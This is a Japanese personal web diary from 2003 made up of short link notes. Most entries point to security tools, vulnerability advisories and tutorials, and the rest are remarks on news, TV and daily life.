Web Server Fingerprint Tool

見事 Server:Apache だけにした場合に Result (7 of 8 tests were positive): Apache 1.3.27 or Apache 1.3.26 ってな具合で当ててくれましたよ(笑

この手のはデータベースのメンテとかが面倒ですよね。

2 [Software] Kerio Personal Firewall 4.0 Beta 2

3.xはbetaで終了だったのかなぁ。というか、このBetaってどこから入手したらいいかワカラン。入手はしたけど。

3 あった。ここだ。

4 [Software] Two Pilots software programs

PDF関連のソフトウェアがいろいろある。

5 [Software] Wincrypt

Wincrypt uses 256 bit AES encryption.

Wincrypt enables users to encrypt (lock) and decrypt (unlock) any type of file, folder or email attachment so that it becomes unreadable to anyone without the password.

6 [Software] incident.pl

他にもbash_loggerとかいろいろある感じ。

7 [Document] PitSaw Documents (Japanese)

理化学研究所。

『PitSawはコンピュータの出力するログなどのイベントデータを、ネットワーク上の他のコンピュータに転送する機能を提供します。』

なんとなく面白そうです。

8 [Document] Iptables Tutorial

濃いいですね。でかいので、こちらからダウンロードできたりする。

9 改竄

不覚にも笑ってしまいました(笑

4月8日のWeb改竄情報(2003.4.8)

誤解ないように追記(汗 Delta5

10 バナー

効果か(笑

れですもさんところの掲示板。

1 目

了解です。m(_ _)m

2 高速充電

で(笑

3 [犯罪][link] 犯罪発生マップ(警視庁)

警察庁ではなくて警視庁なので地域限定。

私はというと居住地は緑、勤務地は赤の中心付近。

4 [Document] TCP/IP Tutorial and Technical Overview

・Part I. Core TCP/IP protocols

・Part 2. TCP/IP application protocols

・Part 3. Advanced concepts and new technologies

5 [Document] httpdをユーザ権限で動作させる

キモは『モジュール形式のPHPやDAVをSuexec同様，任意の所有者権限で動作させることを考えてみましょう．』というところ。なかみつさん。

知人の中では、知ってはいるけど結局httpdでさえrootだったりする人が多い気が。

6 [law] 古物営業法施行規則の一部改正試案

関連：インターネット・オークションにおける盗品等の処分状況

INTERNET Watchの記事では

被疑者の年齢が判明している事例では、約半数（44％）が少年によるものという。
また同じ被疑者が複数回にわたりネットオークションで盗品処分を行なった事例
が86％と高い。

RFIDとか導入されたら、こういった方に流れるのかな。

7

RFIDといえばユーロ紙幣は無線タグ付きに？な記事があったな。

RFIDと言えばプライバシー。無料電子メールの開示困難、悲しみ深い家族

男性は今月16日に家を出て帰宅せず、心配した家族がパソコンを操作した結果、
男性がいわゆる自殺系サイトに「仲間を募集します」などの書き込みをしている
ことが判明。仲間とのやり取りは無料の電子メールを利用しており、パスワード
は消去されていた。家族はメールサービスを運営しているマイクロソフト社に開
示を求めたが、「通信の秘密に触れる恐れがあり、裁判所の令状が必要だ。まず
警察と相談してほしい」と回答された。

悲しいとは思うが微妙だ。

8 [Vuln] Demarc PureSecure v1.6 Plaintext Password Vulnerability

Demarcの設定ファイルにrootじゃない人もアクセスできちゃうので云々な脆弱性。

だったらsnort.confも同じような設定にしちゃうといっしょだ。

9 腕競べ

「ハッカーの甲子園」でサーバー侵入の腕競べ　経産省

記事では

日本のソフトウエア輸入は９２００億円（００年）。一方で輸出は１００分の１
の９０億円（同）と、世界に大きく後れを取っている。経産省は、開発に当たる
人材不足が一因と分析する。大会を通じて優秀な人材を集め、英才教育を受けさ
せることで、ソフトウエア産業の国際競争力をつけるねらいだ。 

というねらいで、やることが、

１チーム３人以内で、自分と相手チームのサーバーにあらかじめセキュリティー
上の穴（欠陥）を開けておく。チームで防御を固めながら相手サーバーの穴を探
して侵入、システムをコントロールできるかどうかを競う。 

ねらいからちょっとズレがあるように思うのは私だけかしらん。

ツッコミの訂正(総務省ではなくて経産省)

10 きわめて

・Windows 2000 で赤外線によるファイル転送中にコンピュータがスタンバイ状態になる

にあるMSのサポート技術情報に『受信側のコンピュータの CPU が 1 GHz 以上など、きわめて高速である』とあるが、1GHzはきわめて高速であっているのかなぁ(^^;

1 十二国記オンライン

ゲームシステム、プレイ料金、FAQがでていた。ここ。

夕陽ヶ丘のサンライズみたいなタイプで500円/月。うーん。

2 wiki

をお借りしたりしてます。

けんのぼやき wiki
・パケット生成関連(ソフトウェア)
・ハッカー甲子園(時事ネタ)
　(時事ネタにしてしまうのはアレかもですが。。。)

3 [Microsoft] Windowsセキュリティ情報サービス

サービスについてはport139でいはらさんが話題にしてましたが、サービス提供先のサイトが上記。ドメインがhotfix.jpだ(笑

無料で購読可能なパイロット版の配信を6月上旬より開始します。

無料期間があるようだ。配信開始前まではりこまねば。

提供開始日：2003年6月初旬 (8月1日より有料化)
価格：一年間購読 24,000円(消費税別)、2年目以降も同額
　　　同一法人の場合、一購読あたり最大5メールアドレスまで登録が可能です
　　　 (一購読の申し込みで最大 5 メール アドレスに配信されます) 

hotfix.jpにある最新のセキュリティホール情報はhotfixが無い脆弱性も提供されるような感じがしないでもない。

4 [Microsoft][Document] Windows XP Security Guide Securing Windows XP Clients

この手のリリースが続きますね。

いつもどこからネタ仕入れているんだろう？なcatさんのところより。

5 [Document] Tomcatを使いやすくする: Tomcat 5のフィルター処理の技

そういえば最近、Tomcat関連の海外記事を目にするような気がするなぁ。

Tomcatと言えばアーカイブに含まれているwarでかためられているのって、zipなんですね(正確ではない?)。最近知りました(^^;

6 [law] インターネット時代の著作権

PDFとMovieあり。独立行政法人 経済産業研究所（RIETI）。

・第1セッション：「自由なソフトウェアの未来 」
・第2セッション：「デジタル著作権と知的財産戦略」

7 [犯罪] ネットワーク利用の悪質商法にご注意！！

『悪質商法に関する相談窓口』がありまする。

8 [2ch] ２ちゃんねるアップローダーβ版

新サービスが続きますねぇ。

9 [Software] Nast

As analyzer tool, it has many features like:
* Build LAN hosts list
* Follow a TCP-DATA stream
* Find LAN internet gateways
* Discorver promiscous nodes
* Reset an established connection
* Perform a single half-open portscanner
* Perform a multi half-open portscanner
* Find link type (hub or switch)
* Catch daemon banner of LAN nodes
* Control arp answers to discover possible arp-spoofings
* Byte couting with an optional filter
* Write reports logging

10 [2ch] コテハン・IDストーカー＠newsplus.jp

そいうものらしい。

11 未読

今日は余裕があるので未読メールを読破せしめんと開始したが、面倒になって、既読にしてまった。気持ちがいい。

12 tDiary

今更ながらtDiaryの記述方法のテクニックを勉強したりして(汗
前はPをBRと同じようにしようしていたのですが、それではあんまりうまくないということで。

1 128ビットRSAの鍵生成のデモ: JavaScript

JavaScriptってのがポイントか(笑 ここ。

JavaScript上で、1分程度で20〜40桁の素数を見つける確率的アルゴリズムを実装し、
計算の複雑性理論についていくつかの実感をつかむ 

2 MUTANT DIGITAL TOY

モンタージュ作成。よくできて、１０分くらい遊んでしまた。ここ。WebHunter2より。

3 昨日

更新したつもりが更新していなかったぶんだけ。

プレビュー機能を利用して「これでよしっ」と安心して終了していた(^^;

4 上戸彩

何やら上戸彩ライブ完全生中継とかがやっているようだ。フレッツADSLだとガンダムSEED(意外や意外面白いよ)がやっていて、ACCA(なぜ？とは言わない)な私は何かないものかと常々思っていた。いや、今回はACCAだからとかではなくてプロバイダのおかげでちょっと覗いてみた。

300Kと1Mがあり、1Mだと画像も音もが飛ぶなぁ。

5 積み立て不足

米国企業年金が深刻な状態らしい。約24兆円の積み立て不足だとか。
日本の国民年金も厚生年金もどうなることやらですが。
しかし日本の国民年金未納率はでてきても未納総額とかワカラン。
『米企業年金、主要500社の積み立て不足2000億ドル』

6 しりとり

『自己満足と迷惑を撒き散らす史上最強のしりとり合戦』というのがあり、興味深くwatchしている。錚々たるサイトが連ねている。

手番がきたらどうしよーとしょーもない事を考えた日曜の夜。

1 [Document] Secure Programming for Linux and Unix HOWTO

後で眺めるだけでも眺めてみよう。

2 まだパッチ追いかけますか？

微妙に追いかけていないかも。

意識の低い人がアンチウイルスソフトのパターンファイルが更新されていなくても、周辺が多少メンテされ且つゲートウェイでしっかり対策されていると広まりにくいものですよね(笑

そのださんとこ。ここ。

3 はまり

しょーもないことではまってしまって半日つぶれた。。。

4 オルグ学入門

『議論に負けそうな時のテクニック集。』
必要な事もあるかもしれないが、やんないように気を付けよう。
圏外からのひとことから。ここ。

5 変質者

変質者について。読み応えアリ。
新・サイコドクターあばれ旅から。ここ。

6 地震

とても揺れたなぁ。トレイで小便してましたよ。ビルが倒れたら私はどんな形で掘り起こされるのだろうと、しょーもない事を考えたりしてました(^^;

7 WindowsXP

でAdministrator(グループ)含むを無効にしてはまっていた人が(^^;

[winxp] 起動と終了 Windows.FAQ

8 Honeypot Topology

honeypots@securityfocus.com より。笑ってしまった。ここ。

9 CSI

テレビ東京で放映されている海外ドラマCSI科学捜査班。

なんとも濃い話が多い。今日の話はとてもいたたまれない気持ちになる。捜査やその事実に新たな引き出される事があり、考えることにより得るものも多い。ミステリ好きの方にもいいかも。まぁ是非一度ご覧ください。視聴率悪くて打ち切りーとなって欲しくない民放海外ドラマです。今日の読売新聞のテレビ欄下にある放送塔にも投書が掲載れているなぁ。

ちなみに本日放映された、第7話 惨劇の家のあらすじ。こちらより。

深夜の高級住宅街で家族４人が惨殺される事件が発生。
グリッソムたちが早速現場に駆けつけると、辺りは血の海と化しており、
死体はいずれも鋭利な刃のようなものでめった刺しにされていた。生存
者は女子高生の娘ティーナと４歳になる幼い妹ブレンダのみ。ショック
状態のブレンダは「バッファロー」と答えるだけ。果たして「バッファ
ロー」の意味は？

1 バッファロー

バッファローと言えば。うーん。。。
こっちか(汗 関西では今はやはり虎かしら。
どうやらwowowでもCSI2は放映しているようです。

2 スパム対策のトップ10

元はこちらで、下記引用はこちらから。

・オンラインディスカッショングループへの投稿 
・Usenetへの投稿 
・トラフィックの多いwebサイトでの電子メールの書き込み 
・チャットルームでのドメイン名の登録または電子メールアドレスの送信 
・倒産する可能性のある企業へのユーザ登録または顧客リストの販売 
・リストを販売しているwebサイトでのユーザ登録 
・不要な返信を求める電子メールに対する応答、またはスパムメール内のリンクのクリック 
・成人向けwebサイトの購読 
・簡単に推測できるアドレスの使用 

倒産する可能性のある企業に顧客リストを販売することってあるのだろうか(^^; その前に倒産する可能性があるかの判断がちょっと難しそう。

3 ちょっと

面白かった今日の夜(謎 思わず筆をとる。

4 ちょっと

と言えば今週は微妙に煩雑な毎日でブックマークがたまる日々。ブックマークが増えても活用できる機会が少ないので、ここに残したいのだが。自分が一番検索を使っているのだろうと思うのです(笑

5 [Document] jail環境によるApache

なんとなく某記事でこの関係が旬なのでしょうか？(笑

6 webで話題のモノ - blogmap

Scientific Computation on Playstation 2: Building a Clusterをリンクしていないけれど、webで話題のモノ - blogmap にホソクされていたので、何かと思ったらどうも漏れリファラが原因らしい。webで話題のモノ - blogmap の上位を目指すときはtDiaryをねらい打ちするとか(違

7 [Software] LogIDS 1.0

何かと似てるのは気のせいかしら。めも。

8 [Software] Proxomitron Naoko-4.5

りりーすされたみたい。リンク先は Proxomitron-J 。

1 [Vuln] Axis Network Camera HTTP Authentication Bypass

//でadminの認証が回避できてしまい、いろいろできちゃんだとか。

www.axiscom.co.jp(ファームウェア)にはまだ無いようだ。

2 Michael Moore website in Oscar hack attack

ここ。

3 [Software] Advanced CheckSum Verifier

Windows用のソフトウェアでGUI。シェアウェアっぽいが、ライセンスの記載があってもレジストに関する記述が見あたらないなぁ。

Advanced CheckSum Verifier is a powerful but easy-to-use MD5
and CRC32 checksum calculating and verifying utility. It will
allow you to be sure in integrity of your data.

そう言えばwMD5sumの ver1.1.8 がリリースされている。

4 [Software] USB Monitor

他にもSerial Monitorとかある。たぶんSerialの方はシェアウェア。USBの方はたぶんBetaの間だけフリーウェアなのかな。

5 W杯開催の事後検証

まだ途中っぽい。ここ。

「行政評価とアカウンタビリティーの確立」という今日的なテーマを、
サッカーのワールドカップ開催に関して検証することが本調査研究の
テーマである。

1 [Top] The Top 10 Wireless LAN Policy Violations

1. Unsanctioned or Rogue Access Points 
2. Unsanctioned Wireless Laptops
3. Ad Hoc Networks
4. Access Points Advertising Slow & Unsafe Data Rates
5. Access Points Configured for Both VPN & Open Authentication
6. Accidental Associations with Neighboring Access Points
7. Nonstandard WLAN Access Cards
8. Default SSIDs or Too Much Detail in SSID
9. Insecure Windows XP Settings
10.Off-Hours Traffic

2 [Software] THC-Rut

THC-RUT (aRe yoU There, pronouced as root) is your first knife
on foreign network. It gathers informations from local and remote
networks. 
It offers a wide range of network discovery tools: arp lookup on
an IP range, spoofed DHCP request, RARP, BOOTP, ICMP-ping, ICMP
address mask request, OS fingerprintings, high-speed host discovery,
... The tool is capable of discovering a Class B network within
10 minutes.

3 これでいいんかい、国の委員会　Part　II

バージョンアップすると不公平なのだとか(汗 費用がネックなのかなぁ？いっそのことOpenOffceにしちゃうとか(笑 ここ。
ちなみにOffice97は

無償サポート、2004/1/16まで有償サポートをご提供し、セキュリティ関連につ
いては2004/1/16までご提供します。　　　但し、ホットフィックスのご提供に
ついては既存ホットフィックスの範囲内となります。

その他　メモ、妄想、おたく日記より。

4 ３人

終わることのないインターネットを通じて知り合った仲間との自殺が未だに続いていますが、気のせいか多くは３人のような気がする。検索してみると２人や４人も見受けられるが、圧倒的に３人が多い。

5 [Software] Defuse Root Kit

LKM rootkitを削除するやつかな。

This utility removes LKM rootkits that normally are undetectable via
the help of vmalloc which manages the memory for a kernel module. 
Tested against Adore, Knark, Sinapse, Heroin, and others. 

6 [link] らくらくおでかけネット

国土交通省及び(財)交通エコロジー・モビリティ財団が昨年１月から運用しているサイトらしいですが、このたびリフト付きタクシーやスロープ付きタクシーなどの福祉輸送サービス情報が追加されたらしい。有りがたいことです。

らくらくおでかけネットの拡充について 国土交通省より。

7 [law] Spam Laws

世界各国のスパム関連の法律とか。

8 [Document] Passive OS fingerprinting: Details and Techniques (Part 2)

　その前がPassive OS Fingerprinting: Details and Techniques。
　port139-mlで知った SANS' Information Security Reading Room であがっていたので眺めてみた。前にも似た内容を見た気もするけど、各OSのパケットを提示しながら分かりやすく解説されて眺めやすい。パケット間隔、数、Window Size 等が異なる云々という具合。そう言えばsnortのシグネイチャ(ICMP)にポートスキャンがいくつかあるけど、Passive OS Fingerprinting みたいにチューニングしてない有名どころのポートスキャナの推測(Passive PortScanner Fingerprinting)ってできそうだな(笑 問題は１つの対象に複数のTCPポートをスキャンしてくれないと厳しいかな。あ、IPアドレスの連続したレンジでスキャンしてきたヤツもいけるか。一番の課題はそれをしてなんか意味あるか？なんだけどさ(^^;

1 [Document] apt対応のRed Hat Linux 8.0 (Psyche) ディスクイメージ

を作ってみる。catnap's Diary(毎日更新) 2003/05/29(木)［はれ］より。
・Creating apt-enabled RedHat 8.0 install cdroms

2 激萌え猫ムービー

うー繋がりません。。。見たいぃ。

3 DeepSight

米Symantec、サイバー攻撃警告システムを米国防総省に供給

そう言えばコレ関係で言うと総務省の情報通信ソフト懇談会で米国における情報セキュリティ対策の取組み取り上げられている。それに対するコメントをピックアップすると『得られた情報を分析するための人材の確保に要する費用のほうが大きい』と。

4 [Document] mod_rewrite Rules

mod_rewrite Rules To Stop Worms & Web Attacks。ちゃんと読めてないけどNimda用かな。

5 [Vuln] ntdll.dll内の関数で起こるバッファオーバーフローによる脆弱性

『これは当サイト(Operash)より nesumin 氏が Microsoft に対して報告していた問題』とのこと。Operashより。

6 Apache2

そういえばOS2 device name DoSもFixされているみたいです。って需要少なそうですけど。

7 rfp.labs

いつの間にやらりにゅしてる。リロードしまくってしまた。ここ。

Whisker 終了〜みたいだ。

1 [Vuln] MS03-018

・Internet Information Services 5.0 Denial of service SPIDynamics SPI Labs
・Microsoft IIS ssinc.dll Over-long Filename Buffer Overflow Vulnerability NSFocus

2 [Vuln] Apache2.0.46

・Apache Portable Runtime Denial of Service and Arbitrary Code iDEFENSE

・Additional Details of Apache 2.x Security Flaw (Attack Vectors)
　mod_davだけじゃないらしい。
　任意のコマンドが実行できてしまう可能性もあるぜいと。
　とりあえず、
　・UseCanonicalName Off でいろんな問題を防ぐとか。(Apache2のでふぉ)
　　でもそれってCAN-2002-0840に影響。(Apache2.0.43で修正済)
　・mod_dav : 上記と LimitXMLRequestBody を 10000未満で一時対処。
　・mod_proxy : 無効にせい
　って感じだが、バージョンアップせいという事かな。

3 MS03-007

何やら英語の方を見たら、

Acknowledgments
Microsoft thanks  nesumin from :: Operash :: for reporting the Windows XP
vulnerability to us and working with us to protect customers. 

とあるけど日本の方は無いなぁ

4 [Document] classificationの正しい使い方

ACIDを利用している方とかむけ。Micky's Security Institute より。

5 [Software] Jackpot Mailswerver

Jackpot is a ready-to-run SMTP relay honeypot, written in pure Java.

6 恐るべし。

なんでもでてくるんだなぁ(笑

7 俺ニュース

今日が最後ということで、俺ニュースなページがあちらこちらと。
処理できる情報量ではなかったので私はほとんど拝見していなかったのですが、お疲れ様でした。RNA sideの20030529にビデオ撮影した更新風景の動画があります。